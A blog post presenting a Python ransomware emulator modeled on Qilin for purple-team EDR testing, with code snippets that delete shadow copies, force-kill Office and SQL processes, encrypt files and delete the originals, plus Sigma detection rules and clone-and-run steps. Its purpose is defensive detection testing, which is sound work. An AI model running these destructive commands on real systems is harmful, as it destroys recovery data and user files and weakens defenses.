Author: Valli-Nayagam Chokkalingam
Stop using print-only simulators. This free script emulates real ransomware TTPs – shadow copies, process kills, encryption – and rolls back cleanly. Test your EDR today.

Contents
Disclaimer
This emulator is for authorized purple team training and research only. It is designed to run in an isolated, controlled lab environment (e.g., a disposable VM with a snapshot). Do not run it on any production system, shared network, or without explicit written permission. The author assumes no liability for misuse or damage caused by this software. You have been warned.
The Problem with “Simulators”
Most ransomware simulators print:
[+] Would delete shadow copies now.[+] Would encrypt file.txt.
That’s not so helpful. Your EDR won’t fire. Your SOC won’t learn. You won’t find gaps.We need real behavior – the exact commands that modern ransomware runs:
- vssadmin delete shadows /all /quiet
- taskkill /f /im excel.exe
- Registry keys under HKCU…\Run
- Files turning into .qilin (or .locked, .encrypted) in real time
This post gives you a working ransomware emulator that can decrypt all your files, remove persistence and ransom note – but shadow copies, event logs, and Windows Defender settings are permanently altered. You’ll need a VM snapshot for full recovery. The script is modeled on Qilin’s specific configuration (kill list, .qilin extension), but the TTPs apply to LockBit, BlackCat, Conti, and almost every modern ransomware family.
What Modern Ransomware Actually Does (TTPs, Not Fluff)
I analyzed real samples (Qilin, LockBit, BlackCat). Here’s the minimal behavior you need to emulate – these TTPs are shared across families:
| TTP | Technique | Real Command |
|---|---|---|
| T1486 | Data Encrypted for Impact | AES‑256, custom extension (.qilin, .lockbit, etc.) |
| T1490 | Inhibit System Recovery | vssadmin delete shadows /all /quiet |
| T1562.001 | Disable or Modify Tools | Set-MpPreference -DisableRealtimeMonitoring |
| T1562.009 | Impair Defenses | taskkill /f /im sqlservr.exe, outlook.exe, etc. |
| T1547.001 | Boot or Logon Autostart Execution | HKCU\Software\Microsoft\Windows\CurrentVersion\Run |
| T1070 | Indicator Removal | PowerShell ClearLog |
The table above covers the core destructive TTPs – encryption, shadow copies, process termination, persistence. Qilin has many other TTPs (token manipulation, GPO abuse, ESXi targeting), but those are environment‑specific or too risky for a safe lab. We focused on what matters most for EDR testing on a single Windows host.
Real Qilin (and most ransomware) uses AES‑256 or ChaCha20 for file encryption and RSA‑4096 to protect the key. Our emulator uses Fernet (AES‑128 + HMAC) – a simpler, reversible cipher. The goal is to trigger detection (file extension change, mass file modification) without needing real asymmetric crypto. For EDR testing, the behavior is what matters. Rollback works because we save the key locally.
The Emulator: Code Walkthrough
The emulator is a single Python script. It executes real ransomware actions – but includes a full rollback that decrypts your files and removes persistence. Below are the key code snippets.
The snippets are shortened for readability; they show the core logic. The complete script (with error handling, safety checks, and the full kill list) is on GitHub – https://github.com/AdversaryCraft/ransomware-emulator.
Shadow Copy Deletion (T1490)
def delete_shadow_copies(): subprocess.run("vssadmin delete shadows /all /quiet", shell=True) subprocess.run("wmic shadowcopy delete", shell=True)
Process Termination (T1562.009)
for proc in ["sqlservr.exe", "outlook.exe", "excel.exe"]: subprocess.run(f"taskkill /f /im {proc}", shell=True)
File Encryption (T1486)
def encrypt_one_file(file_path, cipher): with open(file_path, 'rb') as f: plain = f.read() encrypted = cipher.encrypt(plain) with open(file_path + ".qilin", 'wb') as f: f.write(encrypted) os.remove(file_path)
Rollback
def rollback(): cipher = Fernet(key) for root, _, files in os.walk(TARGET_FOLDERS): for f in files: if f.endswith(".qilin"): # decrypt and restore
Safety features included:
- VM detection (warns if not in VirtualBox/VMware)
- Admin elevation
- Self‑protection (never encrypts itself)
- Extension filtering (only data files, not executables)
Detection Rules That Actually Work
After running the emulator, check if your SIEM caught these.
Sigma: Shadow Copy Deletion
This command is almost never used by legitimate software. Alert on it.
title: Ransomware Shadow Copy Deletionlogsource: product: windows service: securitydetection: selection: EventID: 4688 CommandLine|contains|all: - 'vssadmin' - 'delete' - 'shadows'
Sigma: Mass File Extension Change
The unique extension means zero false positives if you see more than a handful.
title: Ransomware File Extension Changelogsource: product: windows service: sysmondetection: selection: EventID: 11 TargetFilename|endswith: '.qilin'
Sigma: Process Termination (taskkill)
Killing Office, SQL, or backup processes in bulk is highly suspicious.
title: Suspicious Taskkill Patternlogsource: product: windows service: securitydetection: selection: EventID: 4688 CommandLine|contains|all: - 'taskkill' - '/f' - '/im'
What about other TTPs?
Defender disable (Set-MpPreference) has high false positives – monitor only when followed by encryption. Registry Run key writes are medium noise – alert on unsigned paths. Event log clearing (wevtutil cl, Clear-EventLog) is low noise – add a Sigma rule for it.
Start with the three rules above. If your EDR didn’t alert on any of these, you have a gap. Now fix it.
Try It Yourself (5 Minutes)
Prerequisites
- Windows VM (VMware/VirtualBox) – take a snapshot
- Python 3.8+
- pip install cryptography
Clone & Run
git clone https://github.com/AdversaryCraft/ransomware-emulatorcd ransomware-emulatorpython ransomware_emulator.py --attack
Rollback
python ransomware_emulator.py --rollback
The script saves the encryption key as ransomware_key.txt. Don’t lose it – but if you do, just revert the VM snapshot. Keep in mind: shadow copies, event logs, and Windows Defender settings are not restored by the rollback – that’s why you need the snapshot.
Limitations (What We Left Out)
| Not emulated | Why |
|---|---|
| Lateral movement (PsExec) | Needs 2 VMs – out of scope for this post |
| BYOVD | Would BSOD your lab |
| EDR unhooking | Can destabilize EDR/process – left out for stability |
| Real C2 callbacks | Fake .onion address – no outbound traffic |
This covers 80% of ransomware’s impact – the noisy, detectable part. Perfect for purple team training, EDR validation, SOC tuning, and IR drills.
Final Word
Stop reading threat reports and start emulating. Run this script, watch what your EDR misses, then fix it. Works for Qilin, LockBit, BlackCat – any modern ransomware that uses the same TTPs.
https://github.com/AdversaryCraft/ransomware-emulator
References
MITRE ATT&CK – https://attack.mitre.org/software/S1242/
Blackpoint Cyber – https://blackpointcyber.com/threat-profile/qilin-ransomware/
Picus Security – https://www.picussecurity.com/resource/blog/qilin-ransomware

Leave a Reply